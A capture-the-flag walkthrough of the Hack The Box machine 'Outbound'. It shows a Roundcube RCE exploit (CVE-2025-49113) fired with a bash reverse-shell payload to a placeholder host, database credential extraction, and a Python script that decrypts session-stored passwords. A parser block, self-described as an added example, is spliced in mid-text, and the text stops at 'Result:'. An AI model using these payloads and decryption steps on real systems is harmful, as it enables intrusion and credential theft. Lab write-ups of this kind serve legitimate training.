# HTB Outbound - Complete Walkthrough
## Machine Information
| Attribute | Value |
|---|---|
| Target IP | 10.x.x.x |
| Hostname | mail.outbound.htb |
| OS | Ubuntu Linux |
| Difficulty | Easy |
| Initial Credentials | tyler:LhKL1o9Nm3X2 |
## Reconnaissance
### Port Scanning
```bash
nmap -sV -sC -v 10.x.x.x
```
Results:
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-12 14:46 CDT
Nmap scan report for mail.outbound.htb (10.x.x.x)
Host is up (0.012s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_http-server-header: nginx/1.24.0 (Ubuntu)
```
### Service Analysis
- SSH (Port 22): OpenSSH 9.6p1 Ubuntu
- HTTP (Port 80): nginx 1.24.0 serving Roundcube webmail
The web application is identified as Roundcube Webmail, accessible at http://mail.outbound.htb/.
## Initial Access
### Roundcube Authentication
Using the provided credentials:
- Username: tyler
- Password: LhKL1o9Nm3X2
Successfully authenticated to the Roundcube webmail interface.
### Vulnerability Identification
After logging in and examining the application, I identified that this Roundcube version is vulnerable to CVE-2025-49113, a remote code execution vulnerability.
### CVE-2025-49113 Exploitation
1. Download the exploit:
```bash
wget https://raw.githubusercontent.com/hakaioffsec/CVE-2025-49113-exploit/refs/heads/main/CVE-2025-49113.php
```
2. Execute the exploit for a reverse shell:
```bash
php exploit.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1'"
```
3. Caught a reverse shell as www-data.
4. Switch to the tyler user:
```bash
su tyler
# Password: LhKL1o9Nm3X2
```
## Information Gathering
### Roundcube Configuration Analysis
Located and examined the Roundcube configuration file:
File: `/var/www/html/roundcube/config/config.inc.php`
Key findings:
```php
// Database connection string
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
// Encryption key for session data
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
```
### Database Enumeration
Connect to the MySQL database:
```bash
mysql -u roundcube -pRCDBPass2025 -h localhost roundcube
```
Examine the session table:
```sql
USE roundcube;
SELECT * FROM session;
```
Session data discovered:
The session table contains base64-encoded serialized PHP data with encrypted user passwords.
Key sessions identified:
- jacob: Active session with encrypted password
- tyler: Current user session
## Lateral Movement
### Session Decryption
Analysis of jacob's session data:
After base64-decoding the session data, found:
```
username|s:5:"jacob";
password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";
```
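The decoded blob above is PHP's session serialization format (`name|<serialize() value>` pairs, which Roundcube base64-encodes into the session table). The following parser is an added example, not code from the walkthrough or from Roundcube; the session record it parses is constructed to mirror the shape of the fragment above, and its password value is a made-up placeholder token.

```python
# Parser for PHP's session serialization (name|<serialize() value> pairs), which
# Roundcube base64-encodes into the session table. Added example, not the page's
# code; SAMPLE_VARS_B64 is a constructed record with a made-up password token.
from base64 import b64decode, b64encode

SAMPLE_VARS_B64 = b64encode(
    b'username|s:5:"jacob";password|s:32:"Q09OU1RSVUNURURfU0FNUExFX1RPS0VO";'
    b'storage_port|i:143;imap_namespace|a:1:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:".";}}}'
).decode()

def _parse_value(buf: bytes, pos: int):
    """Parse one serialize() value at buf[pos]; return (value, next_pos)."""
    tag = chr(buf[pos])
    if tag == "N":                                  # N;
        return None, pos + 2
    if tag in "ibd":                                # i:143;  b:1;  d:1.5;
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end].decode()
        return {"i": int, "b": lambda v: v == "1", "d": float}[tag](raw), end + 1
    if tag == "s":                                  # s:5:"jacob";  (length in bytes)
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2                           # skip  :"
        if buf[start + length:start + length + 2] != b'";':
            raise ValueError(f"malformed string at offset {pos}")
        return buf[start:start + length].decode("utf-8", "replace"), start + length + 2
    if tag == "a":                                  # a:2:{<key><value>...}
        colon = buf.index(b":", pos + 2)
        count, pos, out = int(buf[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, pos = _parse_value(buf, pos)
            out[key], pos = _parse_value(buf, pos)
        if buf[pos:pos + 1] != b"}":
            raise ValueError(f"malformed array at offset {pos}")
        return out, pos + 1
    raise ValueError(f"unsupported type {tag!r} at offset {pos}")

def parse_php_session(vars_b64: str) -> dict:
    """Decode a base64 session blob into {variable_name: python_value}."""
    buf = b64decode(vars_b64)
    pos, result = 0, {}
    while pos < len(buf):
        bar = buf.index(b"|", pos)                  # variable names never contain '|'
        name = buf[pos:bar].decode()
        result[name], pos = _parse_value(buf, bar + 1)
    return result

if __name__ == "__main__":
    for name, value in parse_php_session(SAMPLE_VARS_B64).items():
        print(f"{name} = {value!r}")
```

Running it over a real `session.vars` column value shows exactly which variables a session row stores, which is the quickest way for an administrator to confirm whether credential material sits in that table.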
Password Decryption Script:
```python
#!/usr/bin/env python3
# Decrypts a Roundcube session password: base64( IV (8 bytes) || 3DES-CBC ciphertext ),
# using the des_key taken from config.inc.php.
from base64 import b64decode

from Crypto.Cipher import DES3  # pip install pycryptodome


def decrypt_password(encrypted_password, key="rcmail-!24ByteDESkey*Str"):
    try:
        des_key = key.encode('utf-8')          # 24-byte 3DES key from config.inc.php
        data = b64decode(encrypted_password)
        iv = data[:8]                          # Roundcube prepends the 8-byte IV
        ciphertext = data[8:]
        cipher = DES3.new(des_key, DES3.MODE_CBC, iv=iv)
        decrypted = cipher.decrypt(ciphertext)
        # Strip trailing NUL padding; any remaining non-UTF-8 padding byte is
        # dropped by errors='ignore'
        return decrypted.rstrip(b"\0").decode('utf-8', errors='ignore')
    except Exception as e:
        return f"Error: {str(e)}"


# Jacob's encrypted password (from the session table)
encrypted = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
print(f"Decrypted password: {decrypt_password(encrypted)}")
```
Result: